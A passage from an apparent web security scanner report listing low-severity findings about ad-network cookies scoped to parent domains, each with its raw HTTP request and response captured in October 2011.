Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpx=4940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C694%2C3%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C552%2C14%2C%2C%265671%3D14742%2C608%2C2%2C%2C%264212%3D14742%2C154%2C2%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C608%2C2%2C%2C%267727%3D14742%2C553%2C3%2C%2C%265852%3D14742%2C488%2C2%2C%2C%266286%3D14843%2C141%2C2%2C%2C%266643%3D14894%2C0%2C1%2C%2C%264554%3D15350%2C0%2C1%2C%2C; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933; ses2=13378^2&12566^2&12359^1; ses15=13378^2&13209^3&12566^2&12359^2; cd=false; khaos=GT3FYRAA-6-CO8F; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1%262372%3D1%263810%3D1%262374%3D1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:27:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1%262372%3D1%263810%3D1%262374%3D1%266432%3D1; expires=Wed, 02-Nov-2011 00:27:30 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=4940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C694%2C3%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C612%2C16%2C%2C%265671%3D14742%2C608%2C2%2C%2C%264212%3D14742%2C154%2C2%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C608%2C2%2C%2C%267727%3D14742%2C553%2C3%2C%2C%265852%3D14742%2C488%2C2%2C%2C%266286%3D14843%2C141%2C2%2C%2C%266643%3D14894%2C0%2C1%2C%2C%264554%3D15350%2C0%2C1%2C%2C%262372%3D15352%2C0%2C1%2C%2C%263810%3D15352%2C0%2C1%2C%2C%262374%3D15352%2C0%2C1%2C%2C; expires=Wed, 02-Nov-2011 00:27:30 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

13.104. http://r.openx.net/set

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=25afcb2d-854d-efb2-7940-1323bbd101a7&rtb=f9bdca69-e609-4297-9145-48ea56a0756c HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=ba6bf0b1-8895-45a9-97a1-53f788c412d7; i=d2a43928-76cd-49ea-b899-b41fb371435f; p=1317599506

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:48 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f; expires=Tue, 01-Oct-2013 23:51:48 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.105. http://r.turn.com/r/beacon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/beacon?b2=ZkSA7I0AZ4MffR9fYJOaS7OUxk4yIsAo0Hjd6QMr-OTL4k0mREyxv90izWMmaVqB6KZp_AsihChRf9hcbm1UDQ&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C1002%7C4%7C5%7C9%7C6%7C3; rds=15231%7C15228%7C15249%7C15235%7C15250%7C15228%7C15231%7C15248; rv=1; uid=2944787775510337379

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2944787775510337379; Domain=.turn.com; Expires=Sat, 31-Mar-2012 00:41:27 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 03 Oct 2011 00:41:26 GMT

GIF89a.............!.......,...........D..;

13.106. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/cms/id/0/ddc/1/pid/43/uid/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/cms/id/0/ddc/1/pid/43/uid/?xid=u02DzKG_.KFBo5S2yyqljPCE HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://cdn.turn.com/server/ddc.htm?uid=2944787775510337379&mktid=&mpid=&fpid=5&rnd=2692888823581473023&nu=n&sp=y&ctid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; uid=2944787775510337379; rrs=1006%7C1003%7C1002%7C4%7C5%7C9%7C6%7C3; rds=15231%7C15228%7C15249%7C15235%7C15250%7C15228%7C15231%7C15248; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=2944787775510337379; Domain=.turn.com; Expires=Fri, 30-Mar-2012 23:53:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 02 Oct 2011 23:53:08 GMT

GIF89a.............!.......,...........D..;

13.107. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/xuPpW

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/du/id/L21rdC8xL21jaHBpZC85/rnd/xuPpW

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC85/rnd/xuPpW HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C3%7C4%7C1004%7C9%7C6; rds=15231%7C15228%7C15248%7C15235%7C15228%7C15228%7C15231; rv=1; uid=2944787775510337379

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2944787775510337379; Domain=.turn.com; Expires=Fri, 30-Mar-2012 23:49:37 GMT; Path=/
Set-Cookie: rrs=1006%7C1003%7C1002%7C4%7C1004%7C9%7C6%7C3; Domain=.turn.com; Expires=Fri, 30-Mar-2012 23:49:37 GMT; Path=/
Set-Cookie: rds=15231%7C15228%7C15249%7C15235%7C15249%7C15228%7C15231%7C15248; Domain=.turn.com; Expires=Fri, 30-Mar-2012 23:49:37 GMT; Path=/
Location: http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/9/url/
Date: Sun, 02 Oct 2011 23:49:37 GMT
Content-Length: 225

<html><body><p>Redirecting to <a href="http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/9/url/">http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/9/u
...[SNIP]...

13.108. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/du/id/L21rdC8xL21jaHBpZC8z/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC8z/ HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26620&s=26621
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C1002%7C4%7C5%7C9%7C6%7C3; rds=15231%7C15228%7C15249%7C15235%7C15250%7C15228%7C15231%7C15248; rv=1; uid=2944787775510337379

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2944787775510337379; Domain=.turn.com; Expires=Sat, 31-Mar-2012 01:52:55 GMT; Path=/
Set-Cookie: rrs=1006%7C1003%7C5%7C1002%7C4%7C1004%7C9%7C6%7C3; Domain=.turn.com; Expires=Sat, 31-Mar-2012 01:52:55 GMT; Path=/
Set-Cookie: rds=15231%7C15228%7C15250%7C15249%7C15235%7C15250%7C15228%7C15231%7C15248; Domain=.turn.com; Expires=Sat, 31-Mar-2012 01:52:55 GMT; Path=/
Location: http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/url/
Date: Mon, 03 Oct 2011 01:52:55 GMT
Content-Length: 225

<html><body><p>Redirecting to <a href="http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/url/">http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/u
...[SNIP]...

13.109. http://r1-ads.ace.advertising.com/site=793631/size=160600/u=2/bnum=63830787/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=793631/size=160600/u=2/bnum=63830787/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site=793631/size=160600/u=2/bnum=63830787/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1061515.793631.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:11:39 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 697
Date: Mon, 03 Oct 2011 00:11:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:11:39 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<!-- PubMatic ad tag (Javascript) : Travelocity_160X600_ATF | http:\/\/www.Travelocity.com | 160 x 600 Wide Skyscraper | Advertising.Com Fixed 3\/24 -->\r\n<script type="text\/javasc
...[SNIP]...

13.110. http://r1-ads.ace.advertising.com/site=793631/size=160600/u=2/bnum=74948035/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=793631/size=160600/u=2/bnum=74948035/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site=793631/size=160600/u=2/bnum=74948035/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1061515.793631.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:06 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 697
Date: Mon, 03 Oct 2011 00:09:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:09:06 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<!-- PubMatic ad tag (Javascript) : Travelocity_160X600_ATF | http:\/\/www.Travelocity.com | 160 x 600 Wide Skyscraper | Advertising.Com Fixed 3\/24 -->\r\n<script type="text\/javasc
...[SNIP]...

13.111. http://r1-ads.ace.advertising.com/site=793633/size=728090/u=2/bnum=55878431/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=793633/size=728090/u=2/bnum=55878431/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site=793633/size=728090/u=2/bnum=55878431/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1061516.793633.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:06 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 690
Date: Mon, 03 Oct 2011 00:09:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:09:06 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<!-- PubMatic ad tag (Javascript) : Travelocity_728X90_ATF | http:\/\/www.Travelocity.com | 728 x 90 Leaderboard | Advertising.Com Fixed 3\/24 -->\r\n<script type="text\/javascript">
...[SNIP]...

13.112. http://r1-ads.ace.advertising.com/site=797434/size=300250/u=2/bnum=24812117/hr=20/hl=8/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.igougo.com%252Fabout%252F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=797434/size=300250/u=2/bnum=24812117/hr=20/hl=8/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.igougo.com%252Fabout%252F

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site=797434/size=300250/u=2/bnum=24812117/hr=20/hl=8/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.igougo.com%252Fabout%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
